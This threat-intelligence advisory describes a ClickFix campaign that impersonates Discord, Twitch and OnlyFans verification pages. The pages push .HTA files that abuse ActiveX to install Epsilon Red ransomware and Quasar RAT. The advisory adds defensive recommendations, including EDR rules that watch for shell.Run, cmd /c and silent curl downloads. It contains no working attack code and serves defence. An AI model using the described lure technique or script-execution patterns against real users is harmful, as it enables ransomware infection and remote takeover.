Summary:
There has been a large-scale ransomware operation active since early July 2025 that has been attacking users all over the world by impersonating popular platforms like Discord, Twitch, OnlyFans, and other social media platforms. The attackers use fake ClickFix-themed verification pages that appear to look like official platform interfaces to trick users into downloading dangerous .HTA (HTML Application) files. The above files exploit ActiveX controls to execute harmful scripts that deploy the Epsilon Red ransomware.

Upon execution, the ransomware encrypts critical files on the victim's computer system with unique extensions and a ransom note message, written in a style comparable to the notorious REvil ransomware, but executed by itself. In addition, the campaign features Quasar RAT (Remote Access Trojan) that enables attackers to gain persistent remote access to compromised systems for eavesdropping or further exploitation.

Deception is backed up by social engineering exploits like romance-themed attacks that exploit emotional trust, particularly with younger users. The infrastructure of the campaign relies on a network of imitation domains, like the ones that mimic Discord's Captcha Bot, in an effort to be believable and go unnoticed.

Analyst Comments:
The reputation capital of established brands like OnlyFans and Discord to bypass users' trust. By taking advantage of ActiveX, an outdated technology that still persists in some unpatched or incorrectly configured systems, the attackers are taking advantage of a persisting security vulnerability that should have already been fixed ages ago.

Specifically, the deliberate introduction of a typo, "Verificatification," to the spoof verification pages appears to be an attempt at looking less polished and therefore less suspect to surface-level visitors. The global scale of the campaign and the employment of reusable, themed delivery pages suggest a well-financed, highly sophisticated, long-term project.

The fact that Quasar RAT is used in conjunction with ransomware indicates a two-stage approach, perhaps for financial exploitation and data theft or system probing. The pairing optimizes the attack payload since attackers can steal sensitive data before it is encrypted, or have access for follow-up attacks.

This also highlights the need to deprecate old elements like ActiveX and Windows Script Host. Any platform, no matter how popular or utilized, can be vulnerable if security best practices are not followed. Organizations and individuals are vulnerable until browsers are hardened by robust hardening, old systems are deprecated, and users are trained in the identification of phishing and social engineering attacks.

Suggested Corrections:
To be protected from this campaign and other similar attacks, organizations and individuals need to follow a multi-layered defense strategy:

Disable Legacy Technologies. Disable ActiveX controls and Windows Script Host (WSH) immediately through Group Policy options or similar system settings to block malicious scripts running through .HTA files or ActiveXObject calls.

Implement Threat Intelligence: Utilize threat feeds to proactively blacklist known malicious IPs, domains, and Indicators of Future Attack (IOFAs) associated with ClickFix-themed campaigns. Solutions like CloudSEK XVigil Malware Logs can be employed to identify and block such threats in real time.

Enhance Endpoint Security: Use Endpoint Detection and Response (EDR) tools with rules to detect unusual activity, such as hidden script executions (e.g., shell.Run, cmd /c), silent downloads through tools like curl, or browser-executed spawned processes. Update EDR signatures to stay ahead of ever-changing ransomware strains.

User Awareness Training: Conduct regular security awareness training focused on identifying social engineering methods, particularly those masquerading as platforms like Discord, Twitch, or OnlyFans. Conduct phishing attempts with romance baits or mock verification requests to build user resistance.

Browser and File Hardening: Configure systems to deny execution of high-risk file types like .HTA, .js, .jse, and .vbs by aliasing them to a text editor (e.g., notepad.exe) instead of their default launchers. Strong browser policies need to be enforced to avoid unvalidated scripts and limit the usage of plugins.

Network Monitoring and Filtering: Implement robust network monitoring to detect and prevent connections to known malicious URLs or IPs. Employ web proxies and DNS filtering to block access to spoofed sites that are duplicates of legitimate services.

Patch Management: Maintain all systems, especially those with legacy applications, patched up to the latest levels to avoid known vulnerabilities exploited by ActiveX or other technologies like it. Audit systems regularly for out-of-date components.

Incident Response Planning: Develop and test an incident response plan tailored to ransomware attacks, including backups, system isolation processes, and communication plans to minimize downtime and data loss.

Link(s):
https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware